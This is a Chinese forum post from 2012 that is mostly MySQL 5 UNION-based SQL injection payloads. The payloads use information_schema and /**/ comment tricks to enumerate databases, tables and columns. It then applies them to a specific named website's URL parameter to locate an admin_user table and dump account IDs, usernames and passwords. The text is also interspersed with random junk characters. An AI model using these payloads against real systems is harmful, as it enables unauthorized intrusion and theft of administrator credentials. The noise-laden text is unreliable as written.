查库* _" I- r! Z- y4 o5 T
! o- |) B8 X }% W7 f: l
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
# y8 M8 x% W" W; b# D
4 I5 T `$ o) w查表. B' g$ _6 {0 V5 h' |9 O
, \* x6 Y! e" I3 V
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
( u+ c9 _# H- _7 }7 O0 l
1 g3 N; S4 A F查段* P+ q4 `( P) t9 |1 N: [
9 R8 h' b8 Y3 X' h/ Eid=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
. D f* u( `' y5 _$ r) c4 h- Y! g5 |! [5 `. ?
; c$ d6 e" |( `# }% n8 ~mysql5高级注入方法暴表) }& X! H5 ^# x: d5 b; [
6 l6 i* a5 U, M2 z; R* E, n, J例子如下:8 Y( Y; I. u' { Y2 i$ h1 z
; U/ v$ y# f7 V- k
1.爆表
+ G2 H5 d: c0 }- l- A3 ~http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
2 C7 d5 l' r# E; U1 K这样爆到第4个时出现了admin_user表。
7 c. M% v3 @" V3 y3 a' z. A7 P A% X! w; x! j8 U
2.暴字段! b4 F( x5 [& Y- p
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
) P; M. l4 r( [: K/ l3 z3 z0 ?: K5 ^+ c1 L# Z
/ U e# O4 a7 L; P" a0 `
3.爆密码
8 a! Q: c8 v+ ] o! @. K" Ehttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* + [, l$ I- q: C1 y6 p
1 w* M% W. ]! _* I
7 p3 m) j; Z9 q/ M7 \
|
发表于 2012-9-13 16:29:37
收藏
支持
反对